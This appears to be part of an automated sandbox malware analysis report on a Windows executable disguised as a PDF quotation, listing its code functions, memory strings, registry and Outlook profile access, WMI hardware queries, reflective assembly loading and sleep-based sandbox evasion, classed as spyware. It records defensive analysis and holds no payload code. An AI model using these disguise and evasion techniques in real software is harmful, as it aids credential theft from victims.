                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FD3C480_2_07FD3C48
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FD58280_2_07FD5828
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FD1AA80_2_07FD1AA8
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FD18790_2_07FD1879
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_009620500_2_00962050
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_00D1F3784_2_00D1F378
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_00D1F6C04_2_00D1F6C0
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_058C95084_2_058C9508
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_058CC7204_2_058CC720
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_058CB9D04_2_058CB9D0
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_058C21204_2_058C2120
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_058C00404_2_058C0040
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F3916F4_2_05F3916F
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F30CC84_2_05F30CC8
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F3B8A84_2_05F3B8A8
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F348004_2_05F34800
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F394084_2_05F39408
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F367A84_2_05F367A8
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F330384_2_05F33038
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F4E5384_2_05F4E538
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F4BB704_2_05F4BB70
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F44EB04_2_05F44EB0
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F49F404_2_05F49F40
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F433304_2_05F43330
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F4BB0C4_2_05F4BB0C
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_004520504_2_00452050
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.280478444.0000000007E30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXsacdychyhk.dll" vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276539722.0000000002EAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000003.268519442.0000000003FD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXsacdychyhk.dll" vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000000.228092889.0000000000966000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameToscgshw.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000003.268963225.0000000004309000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXsacdychyhk.dll" vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.275327401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000000.271351352.0000000000456000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameToscgshw.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameltnkdufpWedepUXqgFBFAolaxyD.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.494047607.00000000005E8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.494618712.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exeBinary or memory string: OriginalFilenameToscgshw.exe4 vs Quotation-pdf______________________________________.exe
                    Source: Quotation-pdf______________________________________.exeVirustotal: Detection: 20%
                    Source: Quotation-pdf______________________________________.exeReversingLabs: Detection: 21%
                    Source: Quotation-pdf______________________________________.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe"
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe C:\Users\user\Desktop\Quotation-pdf______________________________________.exe
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess created: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe C:\Users\user\Desktop\Quotation-pdf______________________________________.exeJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quotation-pdf______________________________________.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/3
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Quotation-pdf______________________________________.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation-pdf______________________________________.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Quotation-pdf______________________________________.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: Quotation-pdf______________________________________.exe, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.Quotation-pdf______________________________________.exe.960000.0.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.Quotation-pdf______________________________________.exe.960000.0.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.0.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.1.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.3.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.7.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.2.Quotation-pdf______________________________________.exe.450000.1.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.13.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.5.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.9.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.11.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.Quotation-pdf______________________________________.exe.450000.2.unpack, Form4.cs.Net Code: Add System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_00962AE2 push es; ret 0_2_00962B88
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07F95FA0 push ebx; iretd 0_2_07F95FA1
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07F94269 push 8BFFFFFEh; iretd 0_2_07F9426E
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07F9098F push FFFFFFB0h; ret 0_2_07F90994
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07F91D41 pushfd ; ret 0_2_07F91D42
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FD54D7 push 8BFFFFFEh; retf 0_2_07FD54E9
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_00452AE2 push es; ret 4_2_00452B88
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 4_2_05F42177 push edi; retn 0000h4_2_05F42179
                    Source: Quotation-pdf______________________________________.exeStatic PE information: 0xAF32B78C [Thu Feb 22 02:23:08 2063 UTC]
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 5896Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 2280Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 3764Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 1468Thread sleep count: 5150 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe TID: 4352Thread sleep count: 3528 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWindow / User API: threadDelayed 5150Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWindow / User API: threadDelayed 3528Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000003.268519442.0000000003FD9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DvmcikoVp0QoH6OuVpr
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.275849199.00000000010AD000.00000004.00000020.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000002.494764319.0000000000B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeProcess token adjusted: DebugJump to behavior
